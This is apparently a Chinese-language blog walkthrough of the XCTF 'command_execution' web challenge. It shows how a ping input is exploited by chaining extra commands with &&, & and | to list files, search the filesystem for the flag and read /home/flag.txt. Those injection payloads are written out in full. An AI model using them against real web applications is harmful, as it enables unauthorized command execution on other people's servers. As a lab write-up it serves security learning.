WEB:command_execution

前提知识

        命令执行漏洞

        ping

题目

WEB:command_execution_第1张图片

 WEB:command_execution_第2张图片

先尝试ping一下主机

ping 127.0.0.1

 WEB:command_execution_第3张图片用&&将其截断,并用试一下ls命令能不能运行

127.0.0.1&&ls

 WEB:command_execution_第4张图片

 显示ls可以被运行,寻找文件名包含flag的文件

补充寻找文件的命令:

find / -name "flag*"

即命令为(三种)

①127.0.0.1 && find / -name "flag*"
②127.0.0.1 & find / -name flag.txt
③127.0.0.1 | find / -name flag.txt

找到了所在目录

WEB:command_execution_第5张图片

再使用linux系统下的cat命令查看flag.txt文件内容 

127.0.0.1 & cat /home/flag.txt
127.0.0.1 && cat /home/flag.txt
127.0.0.1 | cat /home/flag.txt

拿到flagWEB:command_execution_第6张图片

 参考链接:

xctfcommand_execution_rrorb的博客-CSDN博客

攻防世界:command_execution_留将一面与花的博客-CSDN博客

你可能感兴趣的:(攻防世界,网络安全)